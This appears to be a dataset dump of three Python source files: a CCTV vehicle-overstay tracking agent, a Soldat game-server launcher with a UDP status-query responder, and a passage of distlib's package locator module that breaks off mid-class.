source
stringlengths
3
86
python
stringlengths
75
1.04M
vehicle.py
from .agent import *
from .record import Record
from time import time
from datetime import datetime
import os

PAR = True

# Output
base_dir = './output'
# Storage memory parameter: forget a vehicle if not seen for > STORAGE_MEMORY seconds
STORAGE_MEMORY = 8
# Car x1/y1 distance parameter (pixels)
DISTANCE_THRESHOLD = 10
# Feature matching parameters (cosine-similarity band)
COSINE_UPPER_THRESH = 0.9
COSINE_LOWER_THRESH = 0.85
# Feature smoothing parameter (1 => stored feature/box are kept unchanged on update)
FEATURE_MOMENTUM = 1
# Overstay thresholds (seconds) per scene type
CARPARK_BARRIER_THRESH = 60
PICKUP_POINT_THRESH = 180


def make_object_type(overstay):
    """Build and return a Vehicle class whose overstay threshold is bound to
    `overstay` seconds (closure), so different scenes get different thresholds."""

    class Vehicle:
        # Monotonically increasing id counter shared by all instances of this class.
        current_id = 0

        def __init__(self, feature, box):
            cls = type(self)
            self.id = str(cls.current_id)
            self.feature = feature
            self.box = box
            self.first_seen = self.last_seen = time()
            self.imgs = []
            cls.current_id += 1

        def __str__(self):
            return self.id

        @staticmethod
        def is_overstay(seconds):
            """True when a dwell time (seconds) exceeds the bound overstay threshold."""
            return seconds > overstay

        @staticmethod
        def is_alike(similarity):
            """True when a cosine similarity is high enough to be the same vehicle."""
            return similarity >= COSINE_UPPER_THRESH

        @staticmethod
        def is_far(delta):
            return delta > DISTANCE_THRESHOLD

        # Function to compare old and new box
        @staticmethod
        def within_limits(old_box, new_box):
            """True when the new box's x1/y1 are each within DISTANCE_THRESHOLD
            of the old box's (equivalent to the original +/- threshold checks)."""
            return (abs(new_box[0] - old_box[0]) <= DISTANCE_THRESHOLD
                    and abs(new_box[1] - old_box[1]) <= DISTANCE_THRESHOLD)

    return Vehicle


class Storage:
    """In-memory registry of recently seen vehicles, keyed by vehicle id."""

    def __init__(self, object_type, memory=STORAGE_MEMORY):
        self.id_map = {}
        # Default memory = 180, else 60
        self.memory = memory
        self.frames = []
        self.object_type = object_type

    def add(self, feature, box):
        """Register a brand-new vehicle."""
        p = self.object_type(feature, box)
        self.id_map[p.id] = p

    # Original register method
    def reg(self, feature, box):
        """Register or update a vehicle given its appearance feature and box."""
        feature = np.array(feature, np.float32)
        if len(self.id_map):
            # Query feature and get best match.
            q = self.query(feature)
            p = self.id_map[q['id']]
            # If x1, y1 is within limits and the similarity falls in the
            # ambiguous band, treat it as the same vehicle and smooth.
            if (self.object_type.within_limits(p.box, box)
                    and COSINE_LOWER_THRESH <= q['similarity'] < COSINE_UPPER_THRESH):
                p.feature = p.feature * FEATURE_MOMENTUM + feature * (1 - FEATURE_MOMENTUM)
                p.box = p.box * FEATURE_MOMENTUM + box * (1 - FEATURE_MOMENTUM)
            # Update feature if similarity is high.
            elif self.object_type.is_alike(q['similarity']):
                p.feature = p.feature * FEATURE_MOMENTUM + feature * (1 - FEATURE_MOMENTUM)
                p.box = p.box * FEATURE_MOMENTUM + box * (1 - FEATURE_MOMENTUM)
            # Register a new vehicle when similarity is below the lower threshold.
            elif q['similarity'] < COSINE_LOWER_THRESH:
                self.add(feature, box)
            # Possible occlusion or too many similar vehicles in storage.
            else:
                pass
        else:
            # First case: storage is empty, add a new vehicle.
            self.add(feature, box)

    def query(self, feature):
        """Return {'id', 'similarity'} for the stored vehicle most similar to
        `feature` (cosine similarity); raises AssertionError when storage is empty."""
        assert len(self.id_map), 'no id in storage, register first!'
        similarity_lst = []
        vehicle_lst = []  # renamed from id_lst/id to avoid shadowing the builtin
        for v in self.id_map.values():
            similarity_lst.append(self.compare(v.feature, feature))
            vehicle_lst.append(v)
        idx = int(np.argmax(similarity_lst))
        # str(Vehicle) yields its id (see Vehicle.__str__).
        return {'id': str(vehicle_lst[idx]), 'similarity': similarity_lst[idx]}

    def forget(self):
        """Drop vehicles not seen within the last `self.memory` seconds."""
        now = time()
        delete_keys = [k for k, v in self.id_map.items()
                       if now - v.last_seen > self.memory]
        for k in delete_keys:
            del self.id_map[k]

    def add_video(self, frame):
        # BUG FIX: original signature was `def add_video(frame)` (missing self),
        # so any instance call bound the frame to `self` and raised NameError.
        self.frames.append(frame)

    @staticmethod
    def compare(feature1, feature2):
        """Cosine similarity between two feature vectors."""
        f1 = np.array(feature1)
        f2 = np.array(feature2)
        cos = np.dot(f1, f2) / np.linalg.norm(f1) / np.linalg.norm(f2)
        return cos
        # return np.exp(cos - 1)


# Function to perform cropping based on tracking boxes
def _crop(frame, trk_box):
    """Crop an (l, t, w, h) region out of `frame`, clamped to the frame bounds."""
    H, W, _ = frame.shape
    left, t, w, h = map(int, trk_box)
    left = max(left, 0)
    t = max(t, 0)
    r = min(left + w, W)
    b = min(t + h, H)
    crop = frame[t: b, left: r, :]
    return crop


class VehicleAgent(Agent):
    """Agent that tracks vehicles in a camera stream, matches appearance
    features against a Storage, and reports/records overstaying vehicles."""

    # Scene 0 = drop-off point, scene 1 = carpark barrier
    def __init__(self, source, detector_opt, host='localhost', scene=0):
        super().__init__(source, host)
        # Debug mode
        self.debug = detector_opt.debug
        # Current date
        self.current_date = datetime.now().date()  # - timedelta(days=1)
        # Create directories; source looks like '...@<name>/cam...' — TODO confirm.
        source_dir = source[source.find('@') + 1:source.find('/cam')]
        self.source_dir = os.path.basename(source_dir)
        # Output directory: <base_dir>/<source_dir>/<date>
        self.output_dir = os.path.join(os.path.join(base_dir, str(self.source_dir)),
                                       str(self.current_date))
        # Output log .txt
        self.output_log = os.path.join(self.output_dir + '/log.txt')
        # Create directory if it does not exist.
        if not os.path.exists(self.output_dir):
            os.makedirs(self.output_dir)
        # self.q_reg = Queue(32)  # register queue
        self.api_calls = {k: 0 for k in ['register', 'detection', 'feature',
                                         'query', 'refresh', 'attributes', 'counts']}
        # If drop-off point use the longer overstay threshold, else the barrier one.
        if scene == 0:
            self.storage = Storage(make_object_type(PICKUP_POINT_THRESH))
        else:
            self.storage = Storage(make_object_type(CARPARK_BARRIER_THRESH))

        from .vehicle_agent.vehicle_detector import Vehicle_Detector
        # from .vehicle_agent.attribute import VehicleAttributes
        from .vehicle_agent.vehicle_attributes import Vehicle_Attributes
        from .vehicle_agent.vehicle_feature_extractor import Vehicle_Feature_Extractor

        # Initialise detector model; raise conf_thres outside the barrier scene.
        if scene != 0:
            detector_opt.conf_thres = 0.3
        self.vehicle_detector = Vehicle_Detector(detector_opt, scene)
        # Initialise vehicle feature extractor.
        self.vehicle_feature_extractor = Vehicle_Feature_Extractor()
        # Initialise vehicle attribute model (public github model).
        self.vehicle_attribute = Vehicle_Attributes()
        # XZ model: self.vehicle_attribute = VehicleAttributes()

        # Perform detection and push to output queue.
        def det(img):
            detections = self.vehicle_detector.detect(img)
            return detections

        # Perform feature extraction and push to queue.
        def ext(img):
            feature = self.vehicle_feature_extractor.get_features(img)
            return feature

        # Perform feature query on storage; empty dict when storage is empty.
        def query(feature):
            try:
                return self.storage.query(feature)
            except AssertionError:
                return {}

        # Perform vehicle attribute prediction.
        def var(t, img):
            ret = self.vehicle_attribute.predict(img)
            return t, ret

        # Put a frame into a Record object and push to queue.
        def output(record, frame):
            record.add_frame(frame)
            return record, frame

        # Worker for detection.
        self.w_det = Worker(lambda x: (x, det(x)), debug=detector_opt.debug)
        self.w_var = Worker(lambda i, x: (i, var(i, x)), debug=detector_opt.debug)
        # Takes a Track object and cropped image in the process queue.
        self.w_ext = Worker(lambda i, x: (i, ext(x)), debug=detector_opt.debug)
        # Takes a Track object and extracted features.
        self.w_cmp = Worker(lambda i, x: (i, query(x)), debug=detector_opt.debug)
        # Worker containing the Record objects of overstayed objects.
        self.w_record = Worker(lambda x, i: (x, output(x, i)), debug=detector_opt.debug)
        self.workers = [self.w_det, self.w_ext, self.w_cmp, self.w_var, self.w_record]

        self.matches = {}
        self.time0 = {}
        self.reported = set()
        # Create a thread for this instance and begin the main loop.
        self.th = Thread(target=self.loop, daemon=True)
        self.th.start()

    # Push a Track object and cropped image ROI for feature extraction.
    def on_new_det(self, t: Track, img_roi):
        self.w_ext.put(t, img_roi)

    # Check the current system date and roll the output dir over at midnight.
    def check_date(self):
        if datetime.now().date() > self.current_date:
            print('Creating new directory for {}'.format(datetime.now().date()))
            # Update date and create new directory.
            self.current_date = datetime.now().date()
            new_dir = os.path.join(os.path.join(base_dir, str(self.source_dir)),
                                   str(self.current_date))
            os.makedirs(new_dir)
            # Change output directory and output log file paths.
            self.output_dir = new_dir
            self.output_log = new_dir + '/log.txt'

    # Main loop
    def loop(self):
        while self.running:
            # Check date every 600 frames.
            if self.frame_count % 600 == 0:
                self.check_date()
            if self.suspend == True:
                sleep(0.5)
            ret, frame = self.cap.read()
            if not ret or frame is None:
                self.cap = cv2.VideoCapture(self.source)
                continue
            frame_ = frame.copy()
            self.Track.step(frame_)
            if self.frame_count % INTEVAL == 0:
                # Push new frame into the detection worker queue.
                self.w_det.put(frame_)
                # Remove IDs that have not been seen for too long.
                self.storage.forget()
            # Remove dead trackers.
            self.Track.decay()
            self.api_calls['counts'] = len(self.Track.ALL)
            for t in self.Track.ALL:
                i = t.id
                now = time()
                if i in self.time0:
                    seconds = now - self.time0[i]
                else:
                    self.time0[i] = now
                    seconds = 0
                t.stay = seconds
                p = self.storage.id_map.get(i)
                if p is not None:
                    p.last_seen = now
                if self.storage.object_type.is_overstay(seconds):
                    # Request attributes once; report once per id when available.
                    if not hasattr(t, 'par'):
                        self.w_var.put(t, _crop(frame_, t.box))
                    if hasattr(t, 'par'):
                        output_path = os.path.join(
                            self.output_dir,
                            '{}_{}_{}'.format(i, '_'.join(t.par[1]), datetime.now()))
                        if i not in self.reported:
                            self.reported.add(i)
                            print('[overstay] id:', i, '@', self.source)
                            self.w_record.put(Record(output_path + '.avi'), frame_)
                            cv2.imwrite(output_path + '.jpg', _crop(frame_, t.box))
                            with open(self.output_log, 'a') as f:
                                message = 'Overstay id: {} Frame no: {} @ {}'.format(
                                    i, self.frame_count, self.source)
                                # BUG FIX: newline added so log entries do not run together.
                                f.write(message + '\n')
            # Post-detection (KCF tracker) procedures, feed w_ext.
            self._post_det_procedure(frame)
            # Post feature-extraction: push to w_cmp and register in storage.
            self._post_ext_procedure()
            # Post comparison: set matches.
            self._post_cmp_procedure(frame_)
            # Post attribute (par) procedure.
            self._post_par_procedure()
            # Render frame and add it to the display worker queue.
            self._render(frame)
            # Post output procedure.
            self._post_output_procedure(frame)
            # self.display_queue.put(frame[..., ::-1])  # give RGB
            self.display_queue.put(frame)
            self.frame_count += 1
        self._kill_workers()

    # Convert YOLO bboxes from (l, t, r, b, ...) to (l, t, w, h).
    def convert(self, boxes):
        boxes = np.array(list(boxes))
        boxes[:, 2: 4] -= boxes[:, :2]
        return boxes[:, :4]

    # Post-detection procedure: consume detector feedback and update tracks.
    def _post_det_procedure(self, frame=None):
        # If worker queue is not empty.
        if self.w_det.has_feedback():
            frame_, boxes = self.w_det.get()
            # BUG FIX: `boxes != []` is ambiguous/raises for numpy arrays;
            # use an explicit length check instead.
            if boxes is not None and len(boxes):
                # boxes = _cvt_ltrb2ltwh(boxes)
                boxes = self.convert(boxes)
                # self.plot_det_boxes(boxes, frame)
                self.Track.update(frame_, boxes)
                for t in self.Track.ALL:
                    if t.visible:
                        if isinstance(t.id, int):
                            if t.age % REFRESH_INTEVAL == 0:
                                if t.age // REFRESH_INTEVAL:
                                    self.api_calls['refresh'] += 1
                                img_roi = _crop(frame_, t.box)
                                self.on_new_det(t, img_roi)
            else:
                # No detections: hide tracks and decay health (fast-kill young tracks).
                for t in self.Track.ALL:
                    t.visible = False
                    t.health -= 1 if t.age > self.Track.PROBATION else 9999

    # Post feature-extraction procedure.
    def _post_ext_procedure(self):
        # If worker queue is not empty.
        if self.w_ext.has_feedback():
            t, feature = self.w_ext.get()
            t.feature = feature[0]
            self.w_cmp.put(t, feature[0])
            # Velocity filter: only register near-stationary vehicles.
            if abs(t.velocity[0]) < 0.1 and abs(t.velocity[1]) < 0.1:
                self.storage.reg(feature[0], t.box)
                self.api_calls['register'] += 1

    # Feature-similarity comparison results: bind storage ids to tracks.
    def _post_cmp_procedure(self, frame_):
        if self.w_cmp.has_feedback():
            t, ret = self.w_cmp.get()
            i = ret.get('id')
            if i is not None:
                t.similarity = ret.get('similarity')
                if t.similarity > COSINE_UPPER_THRESH:
                    c = colors[hash(i or 0) % 256]
                    if i in self.matches:
                        f = self.matches[i]
                        # Keep the better track for this id; demote the old one.
                        if t > f:
                            f.color = Track.color
                            f.id = int(f.id)
                            f.similarity = 0
                            self.matches[i] = t
                    else:
                        self.matches[i] = t
                    self.matches[i].color = c
                    self.matches[i].id = i

    def _post_par_procedure(self):
        if not self.w_var.p.empty():
            t, att = self.w_var.get()
            setattr(t, 'par', att)

    # Post output procedure: keep feeding frames to unfinished Records.
    def _post_output_procedure(self, frame):
        if self.w_record.has_feedback():
            current_record, _ = self.w_record.get()
            # If True, save video; otherwise requeue with the next frame.
            if current_record.check_save():
                current_record.save_video()
            else:
                self.w_record.put(current_record, frame)

    # Render frame
    def _render(self, frame):
        # super()._render(frame)
        for t in self.Track.ALL:
            # Debugging mode: show track boxes.
            if self.debug:
                t._render(frame)
            x, y, w, h = map(int, t.box)
            r = x + w
            b = y + h
            i = t.id
            now = time()
            if i in self.time0:
                seconds = now - self.time0[i]
            else:
                self.time0[i] = now
                seconds = 0
            t.stay = seconds
            p = self.storage.id_map.get(i)
            if p is not None:
                p.last_seen = now
            # Show only overstaying vehicles.
            if self.storage.object_type.is_overstay(t.stay):
                cv2.rectangle(frame, (x, y), (r, b), t.color, 2)
                if t.visible:
                    if hasattr(t, 'stay'):
                        t.text(frame, 'sec:%d' % int(t.stay), x + 3, y + h - 3, .6, 2)
                    if hasattr(t, 'par'):
                        for item in t.par[1]:
                            y += 20
                            # BUG FIX: the original drew the same text twice
                            # (duplicated cv2.putText call removed).
                            cv2.putText(frame, str(item), (x + w + 3, y),
                                        cv2.FONT_HERSHEY_SIMPLEX, 1., t.color, 2)
        return frame

    # Plot detection boxes.
    def plot_det_boxes(self, boxes, frame):
        for box in boxes:
            cv2.rectangle(frame, (box[0], box[1]),
                          (box[0] + box[2], box[1] + box[3]), (255, 0, 0), 2)
soldat.py
import struct
import sys
import signal
import subprocess
import SocketServer
import ConfigParser
from threading import Thread
from StringIO import StringIO


def read_gamestat():
    """Parse logs/gamestat.txt into a dict of server, team and player stats."""
    with open('logs/gamestat.txt') as fp:
        log = fp.read().splitlines()
    logdata = {
        'numplayers': int(log[1][9:]),
        'mapname': log[2][5:],
        'gametype': log[3][10:],
        'timeleft': log[4][10:],
    }
    teamscores = {}
    if logdata['gametype'] in ("Capture the Flag", "Infiltration"):
        teamscores['alpha'] = int(log[5][8:])
        teamscores['bravo'] = int(log[6][8:])
    elif logdata['gametype'] == "Team Deathmatch":
        teamscores['alpha'] = int(log[5][8:])
        teamscores['bravo'] = int(log[6][8:])
        teamscores['charlie'] = int(log[7][8:])
        teamscores['delta'] = int(log[8][8:])
    logdata['teamscores'] = teamscores
    # And now for individual players: five consecutive lines per player.
    playerdata = []
    players_index = log.index('Players list: (name/kills/deaths/team/ping)') + 1
    for i in xrange(logdata['numplayers']):
        pos = players_index + (i * 5)
        playerdata.append({
            'name': log[pos],
            'points': log[pos + 1],
            'deaths': log[pos + 2],
            'team': log[pos + 3],
            'ping': log[pos + 4],
        })
    logdata['players'] = playerdata
    return logdata


def read_config():
    """Load soldat.ini into a ConfigParser instance."""
    cfg = ConfigParser.ConfigParser()
    with open('soldat.ini') as fp:
        cfg.readfp(fp)
    return cfg


class ASEHandler(SocketServer.BaseRequestHandler):
    """ Request handler for ASE """

    def handle(self):
        data, socket = self.request
        # Only answer the ASE status probe.
        if data != 's':
            return
        response = StringIO()
        response.write('EYE1')

        def write_string(text):
            # Length-prefixed string: one byte holding len(text) + 1, then the text.
            response.write(struct.pack('>B', len(text) + 1))
            response.write(text)

        # Read useful data here.
        cfg = read_config()
        # Parse game logs.
        stat = read_gamestat()
        write_string('Soldat Server')                        # game name
        write_string(cfg.get('NETWORK', 'Port'))             # port number
        write_string(cfg.get('NETWORK', 'Server_Name'))      # server name
        write_string(stat['gametype'])                       # game type
        write_string(stat['mapname'])                        # map name
        write_string('1.6.7')                                # version
        # Passworded flag ('0' when unset or missing).
        try:
            game_password = cfg.get('NETWORK', 'Game_Password')
            if not game_password:
                game_password = '0'
            write_string(game_password)
        except ConfigParser.NoOptionError:
            write_string('0')
        write_string(str(stat['numplayers']))                # num players
        try:
            write_string(cfg.get('NETWORK', 'Max_Players'))  # max players
        except ConfigParser.NoOptionError:
            write_string('16')
        # Send raw data (we have no raw data?).
        write_string('')
        # Send players: name | team | score | ping (skin and time omitted).
        for player in stat['players']:
            flags = 1 | 2 | 8 | 16
            response.write(struct.pack('>B', flags))
            write_string(player['name'])    # flags & 1
            write_string(player['team'])    # flags & 2
            write_string(player['points'])  # flags & 8
            write_string(player['ping'])    # flags & 16
        # Send data.
        socket.sendto(response.getvalue(), self.client_address)


def main():
    """Launch the game server, answer ASE queries, forward signals, mirror exit code."""
    args = sys.argv[1:]
    proc = subprocess.Popen(['./soldatserver'] + args)
    cfg = read_config()
    try:
        ase_port = cfg.getint('NETWORK', 'Port')
    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
        ase_port = 23073
    ase_port += 123
    server = SocketServer.UDPServer(('0.0.0.0', ase_port), ASEHandler)
    th = Thread(target=server.serve_forever)
    th.daemon = True
    th.start()

    def signal_handler(signum, frame):
        # Forward the signal to the child and shut the ASE responder down.
        proc.send_signal(signum)
        server.shutdown()
        proc.wait()
        th.join()

    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    exit_code = proc.wait()
    sys.exit(exit_code)


if __name__ == '__main__':
    main()
locators.py
# -*- coding: utf-8 -*- # # Copyright (C) 2012-2013 Vinay Sajip. # Licensed to the Python Software Foundation under a contributor agreement. # See LICENSE.txt and CONTRIBUTORS.txt. # import gzip from io import BytesIO import json import logging import os import posixpath import re import threading import zlib from . import DistlibException from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url, queue, quote, unescape, string_types, build_opener, HTTPRedirectHandler as BaseRedirectHandler, Request, HTTPError, URLError) from .database import Distribution, DistributionPath, make_dist from .metadata import Metadata from .util import (cached_property, parse_credentials, ensure_slash, split_filename, get_project_data, parse_requirement, parse_name_and_version, ServerProxy) from .version import get_scheme, UnsupportedVersionError from .wheel import Wheel, is_compatible logger = logging.getLogger(__name__) HASHER_HASH = re.compile('^(\w+)=([a-f0-9]+)') CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I) HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml') DEFAULT_INDEX = 'http://python.org/pypi' def get_all_distribution_names(url=None): """ Return all distribution names known by an index. :param url: The URL of the index. :return: A list of all known distribution names. """ if url is None: url = DEFAULT_INDEX client = ServerProxy(url, timeout=3.0) return client.list_packages() class RedirectHandler(BaseRedirectHandler): """ A class to work around a bug in some Python 3.2.x releases. """ # There's a bug in the base version for some 3.2.x # (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header # returns e.g. /abc, it bails because it says the scheme '' # is bogus, when actually it should use the request's # URL for the scheme. See Python issue #13696. def http_error_302(self, req, fp, code, msg, headers): # Some servers (incorrectly) return multiple Location headers # (so probably same goes for URI). Use first header. 
newurl = None for key in ('location', 'uri'): if key in headers: newurl = headers[key] break if newurl is None: return urlparts = urlparse(newurl) if urlparts.scheme == '': newurl = urljoin(req.get_full_url(), newurl) if hasattr(headers, 'replace_header'): headers.replace_header(key, newurl) else: headers[key] = newurl return BaseRedirectHandler.http_error_302(self, req, fp, code, msg, headers) http_error_301 = http_error_303 = http_error_307 = http_error_302 class Locator(object): """ A base class for locators - things that locate distributions. """ source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz') binary_extensions = ('.egg', '.exe', '.whl') excluded_extensions = ('.pdf',) # A list of tags indicating which wheels you want to match. The default # value of None matches against the tags compatible with the running # Python. If you want to match other values, set wheel_tags on a locator # instance to a list of tuples (pyver, abi, arch) which you want to match. wheel_tags = None downloadable_extensions = source_extensions + ('.whl',) def __init__(self, scheme='default'): """ Initialise an instance. :param scheme: Because locators look for most recent versions, they need to know the version scheme to use. This specifies the current PEP-recommended scheme - use ``'legacy'`` if you need to support existing distributions on PyPI. """ self._cache = {} self.scheme = scheme # Because of bugs in some of the handlers on some of the platforms, # we use our own opener rather than just using urlopen. self.opener = build_opener(RedirectHandler()) # If get_project() is called from locate(), the matcher instance # is set from the requirement passed to locate(). See issue #18 for # why this can be useful to know. 
self.matcher = None def clear_cache(self): self._cache.clear() def _get_scheme(self): return self._scheme def _set_scheme(self, value): self._scheme = value scheme = property(_get_scheme, _set_scheme) def _get_project(self, name): """ For a given project, get a dictionary mapping available versions to Distribution instances. This should be implemented in subclasses. If called from a locate() request, self.matcher will be set to a matcher for the requirement to satisfy, otherwise it will be None. """ raise NotImplementedError('Please implement in the subclass') def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Please implement in the subclass') def get_project(self, name): """ For a given project, get a dictionary mapping available versions to Distribution instances. This calls _get_project to do all the work, and just implements a caching layer on top. """ if self._cache is None: result = self._get_project(name) elif name in self._cache: result = self._cache[name] else: result = self._get_project(name) self._cache[name] = result return result def score_url(self, url): """ Give an url a score which can be used to choose preferred URLs for a given project release. """ t = urlparse(url) return (t.scheme != 'https', 'pypi.python.org' in t.netloc, posixpath.basename(t.path)) def prefer_url(self, url1, url2): """ Choose one of two URLs where both are candidates for distribution archives for the same version of a distribution (for example, .tar.gz vs. zip). The current implement favours http:// URLs over https://, archives from PyPI over those from other locations and then the archive name. 
""" result = url2 if url1: s1 = self.score_url(url1) s2 = self.score_url(url2) if s1 > s2: result = url1 if result != url2: logger.debug('Not replacing %r with %r', url1, url2) else: logger.debug('Replacing %r with %r', url1, url2) return result def split_filename(self, filename, project_name): """ Attempt to split a filename in project name, version and Python version. """ return split_filename(filename, project_name) def convert_url_to_download_info(self, url, project_name): """ See if a URL is a candidate for a download URL for a project (the URL has typically been scraped from an HTML page). If it is, a dictionary is returned with keys "name", "version", "filename" and "url"; otherwise, None is returned. """ def same_project(name1, name2): name1, name2 = name1.lower(), name2.lower() if name1 == name2: result = True else: # distribute replaces '-' by '_' in project names, so it # can tell where the version starts in a filename. result = name1.replace('_', '-') == name2.replace('_', '-') return result result = None scheme, netloc, path, params, query, frag = urlparse(url) if frag.lower().startswith('egg='): logger.debug('%s: version hint in fragment: %r', project_name, frag) m = HASHER_HASH.match(frag) if m: algo, digest = m.groups() else: algo, digest = None, None origpath = path if path and path[-1] == '/': path = path[:-1] if path.endswith('.whl'): try: wheel = Wheel(path) if is_compatible(wheel, self.wheel_tags): if project_name is None: include = True else: include = same_project(wheel.name, project_name) if include: result = { 'name': wheel.name, 'version': wheel.version, 'filename': wheel.filename, 'url': urlunparse((scheme, netloc, origpath, params, query, '')), 'python-version': ', '.join( ['.'.join(list(v[2:])) for v in wheel.pyver]), } except Exception as e: logger.warning('invalid path for wheel: %s', path) elif path.endswith(self.downloadable_extensions): path = filename = posixpath.basename(path) for ext in self.downloadable_extensions: if 
path.endswith(ext): path = path[:-len(ext)] t = self.split_filename(path, project_name) if not t: logger.debug('No match for project/version: %s', path) else: name, version, pyver = t if not project_name or same_project(project_name, name): result = { 'name': name, 'version': version, 'filename': filename, 'url': urlunparse((scheme, netloc, origpath, params, query, '')), #'packagetype': 'sdist', } if pyver: result['python-version'] = pyver break if result and algo: result['%s_digest' % algo] = digest return result def _get_digest(self, info): """ Get a digest from a dictionary by looking at keys of the form 'algo_digest'. Returns a 2-tuple (algo, digest) if found, else None. Currently looks only for SHA256, then MD5. """ result = None for algo in ('sha256', 'md5'): key = '%s_digest' % algo if key in info: result = (algo, info[key]) break return result def _update_version_data(self, result, info): """ Update a result dictionary (the final result from _get_project) with a dictionary for a specific version, whih typically holds information gleaned from a filename or URL for an archive for the distribution. """ name = info.pop('name') version = info.pop('version') if version in result: dist = result[version] md = dist.metadata else: dist = make_dist(name, version, scheme=self.scheme) md = dist.metadata dist.digest = self._get_digest(info) if md.source_url != info['url']: md.source_url = self.prefer_url(md.source_url, info['url']) dist.locator = self result[version] = dist def locate(self, requirement, prereleases=False): """ Find the most recent distribution which matches the given requirement. :param requirement: A requirement of the form 'foo (1.0)' or perhaps 'foo (>= 1.0, < 2.0, != 1.3)' :param prereleases: If ``True``, allow pre-release versions to be located. Otherwise, pre-release versions are not returned. :return: A :class:`Distribution` instance, or ``None`` if no such distribution could be located. 
""" result = None r = parse_requirement(requirement) if r is None: raise DistlibException('Not a valid requirement: %r' % requirement) scheme = get_scheme(self.scheme) self.matcher = matcher = scheme.matcher(r.requirement) logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__) versions = self.get_project(r.name) if versions: # sometimes, versions are invalid slist = [] vcls = matcher.version_class for k in versions: try: if not matcher.match(k): logger.debug('%s did not match %r', matcher, k) else: if prereleases or not vcls(k).is_prerelease: slist.append(k) else: logger.debug('skipping pre-release ' 'version %s of %s', k, matcher.name) except Exception: logger.warning('error matching %s with %r', matcher, k) pass # slist.append(k) if len(slist) > 1: slist = sorted(slist, key=scheme.key) if slist: logger.debug('sorted list: %s', slist) result = versions[slist[-1]] if result and r.extras: result.extras = r.extras self.matcher = None return result class PyPIRPCLocator(Locator): """ This locator uses XML-RPC to locate distributions. It therefore cannot be used with simple mirrors (that only mirror file content). """ def __init__(self, url, **kwargs): """ Initialise an instance. :param url: The URL to use for XML-RPC. :param kwargs: Passed to the superclass constructor. """ super(PyPIRPCLocator, self).__init__(**kwargs) self.base_url = url self.client = ServerProxy(url, timeout=3.0) def get_distribution_names(self): """ Return all the distribution names known to this locator. 
""" return set(self.client.list_packages()) def _get_project(self, name): result = {} versions = self.client.package_releases(name, True) for v in versions: urls = self.client.release_urls(name, v) data = self.client.release_data(name, v) metadata = Metadata(scheme=self.scheme) metadata.name = data['name'] metadata.version = data['version'] metadata.license = data.get('license') metadata.keywords = data.get('keywords', []) metadata.summary = data.get('summary') dist = Distribution(metadata) if urls: info = urls[0] metadata.source_url = info['url'] dist.digest = self._get_digest(info) dist.locator = self result[v] = dist return result class PyPIJSONLocator(Locator): """ This locator uses PyPI's JSON interface. It's very limited in functionality nad probably not worth using. """ def __init__(self, url, **kwargs): super(PyPIJSONLocator, self).__init__(**kwargs) self.base_url = ensure_slash(url) def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Not available from this locator') def _get_project(self, name): result = {} url = urljoin(self.base_url, '%s/json' % quote(name)) try: resp = self.opener.open(url) data = resp.read().decode() # for now d = json.loads(data) md = Metadata(scheme=self.scheme) data = d['info'] md.name = data['name'] md.version = data['version'] md.license = data.get('license') md.keywords = data.get('keywords', []) md.summary = data.get('summary') dist = Distribution(md) urls = d['urls'] if urls: info = urls[0] md.source_url = info['url'] dist.digest = self._get_digest(info) dist.locator = self result[md.version] = dist except Exception as e: logger.exception('JSON fetch failed: %s', e) return result class Page(object): """ This class represents a scraped HTML page. """ # The following slightly hairy-looking regex just looks for the contents of # an anchor link, which has an attribute "href" either immediately preceded # or immediately followed by a "rel" attribute. 
The attribute values can be # declared with double quotes, single quotes or no quotes - which leads to # the length of the expression. _href = re.compile(""" (rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)? href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*)) (\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))? """, re.I | re.S | re.X) _base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S) def __init__(self, data, url): """ Initialise an instance with the Unicode page contents and the URL they came from. """ self.data = data self.base_url = self.url = url m = self._base.search(self.data) if m: self.base_url = m.group(1) _clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I) @cached_property def links(self): """ Return the URLs of all the links on a page together with information about their "rel" attribute, for determining which ones to treat as downloads and which ones to queue for further scraping. """ def clean(url): "Tidy up an URL." scheme, netloc, path, params, query, frag = urlparse(url) return urlunparse((scheme, netloc, quote(path), params, query, frag)) result = set() for match in self._href.finditer(self.data): d = match.groupdict('') rel = (d['rel1'] or d['rel2'] or d['rel3'] or d['rel4'] or d['rel5'] or d['rel6']) url = d['url1'] or d['url2'] or d['url3'] url = urljoin(self.base_url, url) url = unescape(url) url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url) result.add((url, rel)) # We sort the result, hoping to bring the most recent versions # to the front result = sorted(result, key=lambda t: t[0], reverse=True) return result class SimpleScrapingLocator(Locator): """ A locator which scrapes HTML pages to locate downloads for a distribution. This runs multiple threads to do the I/O; performance is at least as good as pip's PackageFinder, which works in an analogous fashion. """ # These are used to deal with various Content-Encoding schemes. 
